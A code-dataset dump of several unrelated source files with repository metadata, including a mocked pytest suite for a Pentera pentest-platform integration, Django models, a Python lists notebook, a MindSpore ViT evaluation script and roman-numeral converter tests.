c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
import jwt
from Pcysys import Client, pentera_run_template_command, pentera_get_task_run_status_command, \
pentera_get_task_run_full_action_report_command, pentera_authentication
MOCK_PENTERA_FULL_ACTION_REPORT = 'penterascan-5e4530961deb8eda82b08730.csv'
MOCK_CSV = open('TestData/mock_csv_file', 'r').read()
MOCK_AUTHENTICATION = {
"token": "TOKEN",
"tgt": "TGT"
}
MOCK_AUTHENTICATION_EXP = 1579763364
MOCK_RUN_TEMPLATE = {
"taskRuns": [
{
"status": "Running",
"taskRunId": "5e41923cf24e1f99979b1cb4",
"taskRunName": "Test mock task run name",
"startTime": 1581348380358.0,
"endTime": 1581349123973.0,
}
],
}
MOCK_TASK_RUN_STATS = {
"taskRuns": [
{
"taskRunId": "5e41923cf24e1f99979b1cb4",
"taskRunName": "Test mock task run name",
"startTime": 1581348380358.0,
"endTime": 1581349123973.0,
"status": "Warning"
}
]
}
def test_pentera_get_task_run_full_action_report(mocker, requests_mock):
mocker.patch.object(demisto, 'params', return_value={
'url': 'https://pentera.com',
'port': '8181'
})
mocker.patch.object(demisto, 'getIntegrationContext', return_value={
'base_url': 'https://pentera.com',
'tgt': 'omgNewTGT',
'accessToken': 'omgNewSecret',
'expiry': MOCK_AUTHENTICATION_EXP
})
mocker.patch.object(demisto, 'args', return_value={
'task_run_id': '5e4530961deb8eda82b08730'
})
requests_mock.get('https://pentera.com:8181/api/v1/taskRun/5e4530961deb8eda82b08730/fullActionReportCSV',
text=MOCK_CSV)
client_id = demisto.params().get('clientId')
tgt = demisto.params().get('tgt')
base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
args = demisto.args()
client = Client(
base_url=base_url,
tgt=tgt,
verify=verify_certificate,
client_id=client_id,
proxy=proxy,
headers={'Accept': 'application/json'})
entries = pentera_get_task_run_full_action_report_command(client, args)
raw_csv_file_name = entries[0]['File']
assert raw_csv_file_name == MOCK_PENTERA_FULL_ACTION_REPORT
task_run_id = entries[1]['EntryContext']['Pentera.TaskRun(val.ID == obj.ID)']['ID']
assert task_run_id == '5e4530961deb8eda82b08730'
operation_type = entries[1]['EntryContext']['Pentera.TaskRun(val.ID == obj.ID)']['FullActionReport'][0][
'Operation Type']
assert operation_type == 'BlueKeep (CVE-2019-0708) Vulnerability Discovery'
def test_pentera_get_task_run_stats(mocker, requests_mock):
mocker.patch.object(demisto, 'params', return_value={
'url': 'https://pentera.com',
'port': '8181'
})
mocker.patch.object(demisto, 'getIntegrationContext', return_value={
'base_url': 'https://pentera.com',
'tgt': 'omgNewTGT',
'accessToken': 'omgNewSecret',
'expiry': MOCK_AUTHENTICATION_EXP
})
mocker.patch.object(demisto, 'args', return_value={
'task_run_id': '5e41923cf24e1f99979b1cb4'
})
requests_mock.get('https://pentera.com:8181/api/v1/taskRun/5e41923cf24e1f99979b1cb4',
json=MOCK_RUN_TEMPLATE)
client_id = demisto.params().get('clientId')
tgt = demisto.params().get('tgt')
base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
args = demisto.args()
client = Client(
base_url=base_url,
tgt=tgt,
verify=verify_certificate,
client_id=client_id,
proxy=proxy,
headers={'Accept': 'application/json'})
readable, parsed, raw = pentera_get_task_run_status_command(client, args)
assert parsed['Pentera.TaskRun(val.ID == obj.ID)']['ID'] == MOCK_TASK_RUN_STATS['taskRuns'][0]['taskRunId']
def test_pentera_run_template(mocker, requests_mock):
mocker.patch.object(demisto, 'params', return_value={
'url': 'https://pentera.com',
'port': '8181'
})
mocker.patch.object(demisto, 'getIntegrationContext', return_value={
'base_url': 'https://pentera.com',
'tgt': 'omgNewTGT',
'accessToken': 'omgNewSecret',
'expiry': MOCK_AUTHENTICATION_EXP
})
mocker.patch.object(demisto, 'args', return_value={
'template_name': 'omgRunThisTemplate'
})
requests_mock.post('https://pentera.com:8181/api/v1/template/runBulk', json=MOCK_RUN_TEMPLATE)
client_id = demisto.params().get('clientId')
tgt = demisto.params().get('tgt')
base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
args = demisto.args()
client = Client(
base_url=base_url,
tgt=tgt,
verify=verify_certificate,
client_id=client_id,
proxy=proxy,
headers={'Accept': 'application/json'})
readable, parsed, raw = pentera_run_template_command(client, args)
assert parsed['Pentera.TaskRun(val.ID == obj.ID)']['Status'] == MOCK_RUN_TEMPLATE['taskRuns'][0]['status']
def test_pentera_authentication(mocker, requests_mock):
mocker.patch.object(demisto, 'params', return_value={
'clientId': 'mmtzv',
'tgt': 'omgSecretsWow',
'url': 'https://pentera.com',
'port': '8181'
})
mocker.patch.object(jwt, 'get_unverified_header',
return_value={'alg': 'HS256', 'exp': 1579763364, 'iat': 1579762464})
requests_mock.post('https://pentera.com:8181/auth/token', json=MOCK_AUTHENTICATION)
mocker.patch.object(demisto, 'args', return_value={})
mocker.patch.object(demisto, 'setIntegrationContext')
client_id = demisto.params().get('clientId')
tgt = demisto.params().get('tgt')
base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
client = Client(
base_url=base_url,
tgt=tgt,
verify=verify_certificate,
client_id=client_id,
proxy=proxy,
headers={'Accept': 'application/json'})
pentera_authentication(client)
assert demisto.setIntegrationContext.call_count == 1
integration_context = demisto.setIntegrationContext.call_args[0][0]
assert isinstance(integration_context, dict)
assert integration_context['expiry'] == MOCK_AUTHENTICATION_EXP
assert integration_context['accessToken'] == MOCK_AUTHENTICATION['token']
| 39.045198 | 111 | 0.653017 |
ea220d728ed62d821c3fbebff00c689b1425b5f7
| 728 |
py
|
Python
|
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | 1 |
2021-04-02T17:43:48.000Z
|
2021-04-02T17:43:48.000Z
|
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | 1 |
2020-12-18T18:04:49.000Z
|
2020-12-18T18:04:49.000Z
|
# Задача 1. Вариант 30.
'''
Напишите программу, которая выводит имя "Илья Арнольдович Файзильберг",
и запрашивает его псевдоним. Программа должна сцеплять две эти строки
и выводить полученную строку, разделяя имя и псевдоним с помощью тире.
'''
# SHCHUKIN F. O.
# 24.02.2016
from sys import stdout as c
from time import sleep
name = 'Илья Арнольдович Файнзильберг'
question = 'Какой псевдоним носил советский писатель ' + name + '?'
sleep(1.0)
def printer(text):
for char in text:
c.write(char)
c.flush()
pause = 0.03
sleep(pause)
printer(question)
c.write('\n'*2)
answer = input('Ваш ответ: ')
c.write('\n'*2)
printer('Правильно: ' + name + ' - ' + answer)
c.write('\n'*2)
input('ok')
| 22.060606 | 71 | 0.673077 |
17f132d4e7c624ad4fa893494275758b3a8be675
| 1,012 |
py
|
Python
|
S6/CS334-NPL/003c_shared_memory (005c).py
|
joe247/CSE-LABS
|
bab17548562bdc9c0bc8b15679f07379a9e98dec
|
[
"MIT"
] | 2 |
2021-02-03T02:03:21.000Z
|
2021-07-03T20:24:14.000Z
|
S6/CS334-NPL/003c_shared_memory (005c).py
|
joe247/CSE-LABS
|
bab17548562bdc9c0bc8b15679f07379a9e98dec
|
[
"MIT"
] | null | null | null |
S6/CS334-NPL/003c_shared_memory (005c).py
|
joe247/CSE-LABS
|
bab17548562bdc9c0bc8b15679f07379a9e98dec
|
[
"MIT"
] | null | null | null |
import multiprocessing
def square_list(mylist, result, square_sum):
""" function to square a given list """
# append squares of mylist to result array
for idx, num in enumerate(mylist):
result[idx] = num * num
# square_sum value
square_sum.value = sum(result)
# print result Array
print(f'Result (in process p1): {result[:]}')
# print square_sum Value
print(f'Sum of squares (in process p1): {square_sum.value}')
if __name__ == "__main__":
# input list
mylist = [1,2,3,4]
# creating Array of int data type with space for 4 integers
result = multiprocessing.Array('i', 4)
# creating Value of int data type
square_sum = multiprocessing.Value('i')
# creating new process
p1 = multiprocessing.Process(target=square_list, args=(mylist, result, square_sum))
# starting process
p1.start()
# wait until process is finished
p1.join()
# print result array
print(f'Result (in main process): {result[:]}')
# print square_sum Value
print(f'Sum of squares (in main process): {square_sum.value}')
| 30.666667 | 84 | 0.718379 |
101e8f19fec5996b4135ab21dd8ee960a387292b
| 829 |
py
|
Python
|
FUNDASTORE/APPS/PRODUCTOS/models.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/APPS/PRODUCTOS/models.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/APPS/PRODUCTOS/models.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
from django.db import models
# Create your models here.
class Categoria(models.Model):
cat_id = models.AutoField(primary_key=True)
cat_nombre = models.CharField(max_length=128)
cat_itbms = models.DecimalField(max_digits=8,decimal_places=2)
def __str__(self):
return self.cat_nombre
class Producto(models.Model):
pro_id = models.AutoField(primary_key=True)
pro_nombre = models.CharField(max_length=128)
pro_precio = models.DecimalField(max_digits=8,decimal_places=2)
pro_stock = models.IntegerField()
pro_descripcion = models.TextField(null=True)
pro_categoria = models.ForeignKey(to=Categoria,on_delete=models.CASCADE,null=True)
pro_imagen = models.ImageField(upload_to='PRODUCTOS',max_length=128,default='default.png')
def __str__(self):
return self.pro_nombre
| 37.681818 | 94 | 0.75392 |
102b53d41bd2daccf298fd33e72a775ec553f087
| 10,181 |
py
|
Python
|
Python X/Lists.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Lists.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Lists.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"# lists are used to store a list of things; similar to arrays in java \n",
"# note the use of square brackets and\n",
"\n",
"a = [3, 10, -1]"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1]\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [],
"source": [
"# .append function adds your number to the list\n",
"\n",
"a.append(2)"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2]\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2, 'yayay']\n"
]
}
],
"source": [
"# list can contain numbers, text or other lists\n",
"\n",
"a.append(\"yayay\")\n",
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2, 'yayay', [6, 7]]\n"
]
}
],
"source": [
"a.append([6, 7])\n",
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[6, 7]"
]
},
"execution_count": 9,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a.pop()"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2, 'yayay']\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'yayay'"
]
},
"execution_count": 11,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a.pop()"
]
},
{
"cell_type": "code",
"execution_count": 12,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2]\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"3"
]
},
"execution_count": 13,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a[0]"
]
},
{
"cell_type": "code",
"execution_count": 14,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"2"
]
},
"execution_count": 14,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a[3]"
]
},
{
"cell_type": "code",
"execution_count": 15,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"-1"
]
},
"execution_count": 15,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a[2]\n"
]
},
{
"cell_type": "code",
"execution_count": 16,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"-1\n"
]
}
],
"source": [
"print(a[2])"
]
},
{
"cell_type": "code",
"execution_count": 17,
"metadata": {},
"outputs": [],
"source": [
"a[0] = 4.55"
]
},
{
"cell_type": "code",
"execution_count": 18,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[4.55, 10, -1, 2, 2]\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 19,
"metadata": {},
"outputs": [],
"source": [
"b = [\"banana\", \"apple\", \"microsoft\"]"
]
},
{
"cell_type": "code",
"execution_count": 20,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['banana', 'apple', 'microsoft']\n"
]
}
],
"source": [
"print(b)"
]
},
{
"cell_type": "code",
"execution_count": 21,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'banana'"
]
},
"execution_count": 21,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'temp' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-22-bb6d55739a6c>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 2\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 3\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mNameError\u001b[0m: name 'temp' is not defined"
]
}
],
"source": [
"b[0] = temp\n",
"b[0] = b[2]\n",
"b[2] = temp"
]
},
{
"cell_type": "code",
"execution_count": 23,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'microsoft'"
]
},
"execution_count": 23,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]\n",
"b[2]"
]
},
{
"cell_type": "code",
"execution_count": 24,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'banana'"
]
},
"execution_count": 24,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]"
]
},
{
"cell_type": "code",
"execution_count": 25,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'microsoft'"
]
},
"execution_count": 25,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]\n",
"b[2]"
]
},
{
"cell_type": "code",
"execution_count": 26,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"banana\n",
"microsoft\n"
]
}
],
"source": [
"print(b[0])\n",
"print(b[2])"
]
},
{
"cell_type": "code",
"execution_count": 27,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'temp' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-27-af3436a9262b>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
"\u001b[0;31mNameError\u001b[0m: name 'temp' is not defined"
]
}
],
"source": [
"b[0] = temp"
]
},
{
"cell_type": "code",
"execution_count": 28,
"metadata": {},
"outputs": [],
"source": [
"temp = b[0]"
]
},
{
"cell_type": "code",
"execution_count": 29,
"metadata": {},
"outputs": [],
"source": [
"b[0] = b[2]\n",
"b[2] = temp"
]
},
{
"cell_type": "code",
"execution_count": 30,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"microsoft\n",
"banana\n"
]
}
],
"source": [
"print(b[0])\n",
"print(b[2])"
]
},
{
"cell_type": "code",
"execution_count": 31,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['microsoft', 'apple', 'banana']\n"
]
}
],
"source": [
"print(b)"
]
},
{
"cell_type": "code",
"execution_count": 32,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['banana', 'apple', 'microsoft']\n"
]
}
],
"source": [
"b[0], b[2] = b[2], b[0]\n",
"print(b)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 18.544627 | 822 | 0.450054 |
106c3edaeb7b07b24af1102f36faeacbaa7d75cf
| 3,904 |
py
|
Python
|
research/cv/vit_base/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 1 |
2021-11-18T08:17:44.000Z
|
2021-11-18T08:17:44.000Z
|
research/cv/vit_base/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | null | null | null |
research/cv/vit_base/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 2 |
2019-09-01T06:17:04.000Z
|
2019-10-04T08:39:45.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Process the test set with the .ckpt model in turn.
"""
import argparse
import mindspore.nn as nn
from mindspore import context
from mindspore.train.model import Model
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.common import set_seed
from mindspore import Tensor
from mindspore.common import dtype as mstype
from mindspore.nn.loss.loss import LossBase
from mindspore.ops import functional as F
from mindspore.ops import operations as P
from src.config import cifar10_cfg
from src.dataset import create_dataset_cifar10
from src.modeling_ms import VisionTransformer
import src.net_config as configs
set_seed(1)
parser = argparse.ArgumentParser(description='vit_base')
parser.add_argument('--dataset_name', type=str, default='cifar10', choices=['cifar10'],
help='dataset name.')
parser.add_argument('--sub_type', type=str, default='ViT-B_16',
choices=['ViT-B_16', 'ViT-B_32', 'ViT-L_16', 'ViT-L_32', 'ViT-H_14', 'testing'])
parser.add_argument('--checkpoint_path', type=str, default='./ckpt_0', help='Checkpoint file path')
parser.add_argument('--id', type=int, default=0, help='Device id')
args_opt = parser.parse_args()
class CrossEntropySmooth(LossBase):
"""CrossEntropy"""
def __init__(self, sparse=True, reduction='mean', smooth_factor=0., num_classes=1000):
super(CrossEntropySmooth, self).__init__()
self.onehot = P.OneHot()
self.sparse = sparse
self.on_value = Tensor(1.0 - smooth_factor, mstype.float32)
self.off_value = Tensor(1.0 * smooth_factor / (num_classes - 1), mstype.float32)
self.ce = nn.SoftmaxCrossEntropyWithLogits(reduction=reduction)
def construct(self, logit, label):
if self.sparse:
label = self.onehot(label, F.shape(logit)[1], self.on_value, self.off_value)
loss_ = self.ce(logit, label)
return loss_
if __name__ == '__main__':
CONFIGS = {'ViT-B_16': configs.get_b16_config,
'ViT-B_32': configs.get_b32_config,
'ViT-L_16': configs.get_l16_config,
'ViT-L_32': configs.get_l32_config,
'ViT-H_14': configs.get_h14_config,
'R50-ViT-B_16': configs.get_r50_b16_config,
'testing': configs.get_testing}
context.set_context(mode=context.GRAPH_MODE, device_target='Ascend', device_id=args_opt.id)
if args_opt.dataset_name == "cifar10":
cfg = cifar10_cfg
net = VisionTransformer(CONFIGS[args_opt.sub_type], num_classes=cfg.num_classes)
loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
opt = nn.Momentum(net.trainable_params(), 0.01, cfg.momentum, weight_decay=cfg.weight_decay)
dataset = create_dataset_cifar10(cfg.val_data_path, 1, False)
param_dict = load_checkpoint(args_opt.checkpoint_path)
print("load checkpoint from [{}].".format(args_opt.checkpoint_path))
load_param_into_net(net, param_dict)
net.set_train(False)
model = Model(net, loss_fn=loss, optimizer=opt, metrics={'acc'})
else:
raise ValueError("dataset is not support.")
acc = model.eval(dataset)
print(f"model's accuracy is {acc}")
| 43.377778 | 100 | 0.695697 |
eaaf912f0e46b43bb4864f1b95cd044d6066ff52
| 1,768 |
py
|
Python
|
python/RomanNumbers/tests/roman_to_arabic_tests.py
|
enolive/learning
|
075b714bd7bea6de58a8da16cf142fc6c8535e11
|
[
"MIT"
] | 8 |
2016-10-18T09:30:12.000Z
|
2021-12-08T13:28:28.000Z
|
python/RomanNumbers/tests/roman_to_arabic_tests.py
|
enolive/learning
|
075b714bd7bea6de58a8da16cf142fc6c8535e11
|
[
"MIT"
] | 29 |
2019-12-28T06:09:07.000Z
|
2022-03-02T03:44:19.000Z
|
python/RomanNumbers/tests/roman_to_arabic_tests.py
|
enolive/learning
|
075b714bd7bea6de58a8da16cf142fc6c8535e11
|
[
"MIT"
] | 4 |
2018-07-23T22:20:58.000Z
|
2020-09-19T09:46:41.000Z
|
import unittest
from assertpy import assert_that
from nose_parameterized import parameterized
from implementation.converter import RomanToArabic
from implementation.exceptions import IllegalArgumentError
from tests.method_conversion import as_function
class RomanToArabicTests(unittest.TestCase):
def setUp(self):
self.target = RomanToArabic()
@parameterized.expand([
("I", 1),
("II", 2),
("III", 3),
])
def test_that_I_should_be_added_to_result(self, number, expected):
# act
result = self.target.to_arabic(number)
# assert
assert_that(result).is_equal_to(expected)
def test_that_invalid_characters_fail(self):
assert_that(as_function(self.target.to_arabic)) \
.raises(IllegalArgumentError) \
.when_called_with("ThisIsNotRoman") \
.is_equal_to("'ThisIsNotRoman' contains characters that are not a roman digit.")
@parameterized.expand([
("V", 5),
("VI", 6),
])
def test_that_V_should_be_added_to_result(self, number, expected):
# act
result = self.target.to_arabic(number)
# assert
assert_that(result).is_equal_to(expected)
@parameterized.expand([
("X", 10),
("XII", 12),
("XV", 15),
])
def test_that_X_should_be_added_to_result(self, number, expected):
# act
result = self.target.to_arabic(number)
# assert
assert_that(result).is_equal_to(expected)
@parameterized.expand([
("IX", 9),
])
def test_that_X_should_be_added_to_result(self, number, expected):
# act
result = self.target.to_arabic(number)
# assert
assert_that(result).is_equal_to(expected)
| 28.983607 | 92 | 0.646493 |
dc23758a8a753da129bb0fb049af3ef4d0b61970
| 3,352 |
py
|
Python
|
tests/test_db.py
|
schmocker/pv-FHNW
|
5066e0bc7ce76be5d1a930b50034c746b232a9f8
|
[
"MIT"
] | 1 |
2019-10-31T13:34:12.000Z
|
2019-10-31T13:34:12.000Z
|
tests/test_db.py
|
schmocker/pv-FHNW
|
5066e0bc7ce76be5d1a930b50034c746b232a9f8
|
[
"MIT"
] | 1 |
2019-05-27T13:03:25.000Z
|
2019-05-27T13:03:25.000Z
|
tests/test_db.py
|
schmocker/pv-FHNW
|
5066e0bc7ce76be5d1a930b50034c746b232a9f8
|
[
"MIT"
] | null | null | null |
import pytest
from pvtool.db import PvModule, Measurement, MeasurementValues, FlasherData, ManufacturerData, db
@pytest.mark.incremental
class TestDBModels(object):
def test_pv_module_insert(client, init_db):
"""
GIVEN a database
WHEN database is initialized
THEN check if pv_module can be inserted and removed
"""
test_pv_module = PvModule(model="TEST",
manufacturer="TEST",
cell_type="TEST",
additional_information="TEST",
price_CHF="-999",
length="-999",
width="-999",
shunt_resistance="-999",
)
db.session.add(test_pv_module)
db.session.commit()
query_result = db.session.query(PvModule).filter(PvModule.model == test_pv_module.model).first()
assert query_result
db.session.query(PvModule).filter(PvModule.model == test_pv_module.model).delete()
db.session.commit()
def test_measurement_insert(client, init_db):
"""
GIVEN a database
WHEN database is initialized
THEN check if pv_module can be inserted and removed
"""
test_measurement = Measurement(date='TEST',
measurement_series='TEST',
producer='TEST',
pv_module_id=1,
)
db.session.add(test_measurement)
db.session.commit()
query_result = db.session.query(Measurement).filter(Measurement.measurement_series == test_measurement.measurement_series).first()
assert query_result
db.session.query(Measurement).filter(Measurement.measurement_series == test_measurement.measurement_series).delete()
db.session.commit()
def test_measurement_values_insert(client, init_db):
"""
GIVEN a database
WHEN database is initialized
THEN check if measurement_values can be inserted and removed
"""
test_measurement_values = MeasurementValues(weather='TEST',
_U_module=0,
_U_shunt=0,
_U_T_amb=0,
_U_T_pan=0,
_U_G_hor=0,
_U_G_pan=0,
_U_G_ref=0,
measurement_id=1,
)
db.session.add(test_measurement_values)
db.session.commit()
query_result = db.session.query(MeasurementValues).\
filter(MeasurementValues.weather == test_measurement_values.weather).first()
assert query_result
db.session.query(MeasurementValues).filter(MeasurementValues.weather == test_measurement_values.weather).delete()
db.session.commit()
def insert_multiple_pv_modules(client, init_db):
pass
| 42.43038 | 138 | 0.50716 |
f4a639b713112f9b536c024ee64449eca00ae287
| 279 |
py
|
Python
|
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 2 |
2020-03-28T13:56:39.000Z
|
2020-03-29T10:16:12.000Z
|
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 76 |
2020-03-27T21:53:04.000Z
|
2020-03-30T20:27:43.000Z
|
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.4 on 2020-03-30 01:52
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('iamstudent', '0003_auto_20200330_0020'),
('iamstudent', '0003_auto_20200329_1859'),
]
operations = [
]
| 18.6 | 50 | 0.655914 |
8734132541ab5ce69ed240741277e35a508b597f
| 723 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
|
Kreijeck/learning
|
